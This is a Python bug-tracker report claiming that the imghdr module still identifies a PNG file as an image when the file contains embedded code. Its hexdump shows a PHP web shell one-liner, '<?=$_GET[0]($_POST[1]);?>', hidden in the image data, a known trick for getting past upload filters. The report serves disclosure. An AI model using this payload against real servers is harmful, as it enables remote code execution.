[New-bugs-announce] [issue26337] Bypass imghdr module determines the type of image

[Ramin Farajpour Cami]

New submission from Ramin Farajpour Cami:

import imghdr
imghdr.what('phppng.png')

output : 
'png'

if you set javascript script in file .png or .jpg ,
output : 
ValueError: invalid \x escape

Hexdump:
root at Ramin:~# hexdump -C phppng.png
00000000  89 50 4e 47 0d 0a 1a 0a  00 00 00 0d 49 48 44 52
|.PNG........IHDR|
00000010  00 00 00 20 00 00 00 20  08 02 00 00 00 fc 18 ed  
|... ... ........|
00000020  a3 00 00 00 09 70 48 59  73 00 00 0e c4 00 00 0e
|.....pHYs.......|
00000030  c4 01 95 2b 0e 1b 00 00  00 60 49 44 41 54 48 89  |...+.....`IDATH.|
00000040  63 5c 3c 3f 3d 24 5f 47  45 54 5b 30 5d 28 24 5f  
|c\<?=$_GET[0]($_|  ### Here PHP Code 
00000050  50 4f 53 54 5b 31 5d 29  3b 3f 3e 58 80 81 81 c1  |POST[1]);?>X....|
00000060  73 5e 37 93 fc 8f 8b db  7e 5f d3 7d aa 27 f7 f1  |s^7.....~_.}.'..|
00000070  e3 c9 bf 5f ef 06 7c b2  30 30 63 d9 b9 67 fd d9  |..._..|.00c..g..|
00000080  3d 1b ce 32 8c 82 51 30  0a 46 c1 28 18 05 a3 60  |=..2..Q0.F.(...`|
00000090  14 8c 82 51 30 0a 86 0d  00 00 81 b2 1b 02 07 78  |...Q0..........x|
000000a0  0d 0c 00 00 00 00 49 45  4e 44 ae 42 60 82        |......IEND.B`.|
000000ae

----------
components: Library (Lib)
files: phppng.png
messages: 260074
nosy: Ramin Farajpour Cami
priority: normal
severity: normal
status: open
title: Bypass imghdr module determines the type of image
type: behavior
versions: Python 3.5
Added file: http://bugs.python.org/file41891/phppng.png

_______________________________________
Python tracker <report at bugs.python.org>
<http://bugs.python.org/issue26337>
_______________________________________